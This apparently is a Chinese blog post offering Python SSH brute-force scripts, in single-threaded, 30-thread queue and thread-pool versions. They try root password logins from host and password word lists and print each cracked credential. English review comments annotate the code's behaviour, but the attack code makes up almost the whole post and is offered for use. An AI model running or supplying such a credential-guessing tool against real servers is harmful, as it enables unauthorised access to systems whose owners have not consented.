前些天,基友发我一个ssh爆破工具,看起来很吊的样子。然后我闲着无聊,自己也写了个py脚本。
单线程版本:慢成狗
#coding:utf-8
#author:jwong
import threading
import os
import time
import paramiko
import sys
import Queue
import socket
# Directory containing this script; the word-list paths further down are built from it.
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
def ssh_connect(host, pwd):
    """Try one password login as ``root`` on ``host`` and print a line on success.

    A paramiko session is opened to port 22 with a 5 second timeout and closed
    again straight away. Authentication failures and socket errors are dropped
    silently, and nothing is returned.

    Review notes:
    - ``AutoAddPolicy`` accepts whatever host key the server presents, so the
      server's identity is never verified.
    - Only password authentication for ``root`` is attempted. A server whose
      sshd configuration sets ``PermitRootLogin no`` or
      ``PasswordAuthentication no`` refuses every attempt made here, and each
      refusal is an authentication failure the server can log and rate-limit.
    """
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(
            hostname=host,
            port=22,
            username='root',
            password=pwd,
            timeout=5,
        )
        client.close()
        print('破解成功!用户名:root' + '密码:' + pwd + ',ip:' + host)
    except (paramiko.AuthenticationException, socket.error):
        # Rejected password or unreachable host: this attempt produces no output.
        pass
# class ClassName(object):
# """docstring for ClassName"""
# def __init__(self, arg):
# super(ClassName, self).__init__()
# self.arg = arg
#
# Word lists read by open_file(), one entry per line. The backslash separators
# are kept literally by Python, so these are Windows-style paths.
host_file = BASE_DIR + '\dict\hosts.txt'
pass_file = BASE_DIR + '\dict\pass.txt'
def open_file(path):
    """Return the non-empty lines of the text file at ``path`` as a list.

    Only newline characters are stripped from each line, so other surrounding
    whitespace is kept. A line that is empty once its newlines are removed is
    skipped.
    """
    with open(path, 'r') as handle:
        stripped = [raw.strip('\n') for raw in handle]
    return [entry for entry in stripped if entry != '']
# Load both word lists, then walk every (host, password) combination one
# connection at a time; the host is printed before each attempt.
hosts = open_file(host_file)
password = open_file(pass_file)
for host, pass12 in ((h, p) for h in hosts for p in password):
    print(host)
    ssh_connect(host, pass12)
运行时会出现 No handlers could be found for logger "paramiko.transport" 的错误提示,原因是没有为 paramiko 的日志配置 handler,参见:http://stackoverflow.com/questions/19152578/no-handlers-could-be-found-for-logger-paramiko
多线程版本:
#coding:utf-8
import threading
import Queue
import paramiko
import socket
import os
# Directory containing this script; both word-list paths are built from it.
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# Word lists, one entry per line. The backslash separators are kept literally
# by Python, so these are Windows-style paths.
host_file = BASE_DIR + '\dict\hosts.txt'
pass_file = BASE_DIR + '\dict\pass.txt'
# Send paramiko's log records to a file. NOTE(review): presumably added to get
# rid of the "No handlers could be found" message -- confirm.
paramiko.util.log_to_file("filename.log")
# Work queue of (host, password) tuples shared by all worker threads.
queue = Queue.Queue()
# Created here but not referenced anywhere else in this listing.
lock = threading.Lock()
def read_host_file(path):
    """Read host entries from ``path`` and return them as resolved address strings.

    Every line is stripped of surrounding whitespace and passed through
    ``socket.gethostbyname``; a resolver error propagates to the caller.

    The ``line == ''`` comparison is made before stripping, so it only skips a
    line that is an empty string. A blank line that still ends in a newline is
    stripped and handed to the resolver like any other entry.
    """
    with open(path, 'r') as handle:
        return [
            socket.gethostbyname(raw.strip())
            for raw in handle.readlines()
            if raw != ''
        ]
def read_pass_file(path):
    """Return every line of the file at ``path`` with surrounding whitespace removed.

    The ``line == ''`` comparison is made before stripping, so it only skips a
    line that is an empty string. A blank line that still ends in a newline
    therefore ends up in the result as an empty entry.
    """
    with open(path, 'r') as handle:
        return [raw.strip() for raw in handle.readlines() if raw != '']
class SSH(threading.Thread):
    """Worker thread that takes (host, password) tuples from a shared queue.

    Each tuple is used for one password login as ``root`` on port 22 with a
    5 second timeout; an accepted login is printed, and every failure is
    discarded.

    Review notes:
    - ``AutoAddPolicy`` accepts whatever host key the server presents, so the
      server's identity is never verified.
    - Only password authentication for ``root`` is attempted. A server whose
      sshd configuration sets ``PermitRootLogin no`` or
      ``PasswordAuthentication no`` refuses every attempt, and each refusal is
      an authentication failure the server can log and rate-limit.
    """

    def __init__(self, queue):
        super(SSH, self).__init__()
        self.queue = queue

    def run(self):
        """Process queue items forever; the loop has no exit condition of its own."""
        while True:
            host, pwd = self.queue.get()
            try:
                client = paramiko.SSHClient()
                client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                client.connect(
                    hostname=host,
                    port=22,
                    username='root',
                    password=pwd,
                    timeout=5,
                )
                client.close()
                print('破解成功!用户名:root' + '密码:' + pwd + ',ip:' + host)
            except (paramiko.AuthenticationException, socket.error):
                # Rejected password or unreachable host.
                pass
            except:
                # Everything else is swallowed as well, so no failure is ever
                # reported by a worker.
                pass
            # NOTE(review): the listing lost its indentation; task_done() is
            # taken to run once per item, at loop level, so that queue.join()
            # can return.
            self.queue.task_done()
if __name__ == '__main__':
    hosts = read_host_file(host_file)
    passlist = read_pass_file(pass_file)

    # Thirty daemon workers share the module-level queue. They are daemon
    # threads because SSH.run() never returns on its own.
    for _ in range(30):
        worker = SSH(queue)
        worker.daemon = True
        worker.start()

    # Queue every (host, password) combination.
    for host in hosts:
        for pwd in passlist:
            queue.put((host, pwd))

    # Block until every queued item has been marked done by a worker.
    queue.join()
另一种实现(使用 multiprocessing.dummy 的线程池,沿用上面的 ssh_connect、read_host_file、read_pass_file):
#coding:utf-8
from multiprocessing.dummy import Pool as ThreadPool
from functools import partial
if __name__ == '__main__':
    # read_host_file, read_pass_file, ssh_connect and the two path variables
    # are not defined in this snippet; they come from the earlier listings.
    hosts = read_host_file(host_file)
    passlist = read_pass_file(pass_file)
    for host in hosts:
        # NOTE(review): the listing lost its indentation; the pool calls are
        # taken to belong to this loop, i.e. one 20-thread pool per host.
        try_password = partial(ssh_connect, host)
        workers = ThreadPool(20)
        # map() blocks until every password has been tried against this host.
        workers.map(try_password, passlist)
        workers.close()
        workers.join()
参考文献:
http://www.ibm.com/developerworks/cn/aix/library/au-threadingpython/
http://www.waitalone.cn/python-mysql-mult.html
http://www.waitalone.cn/python-brute-all.html
http://www.waitalone.cn/python-thread-map.html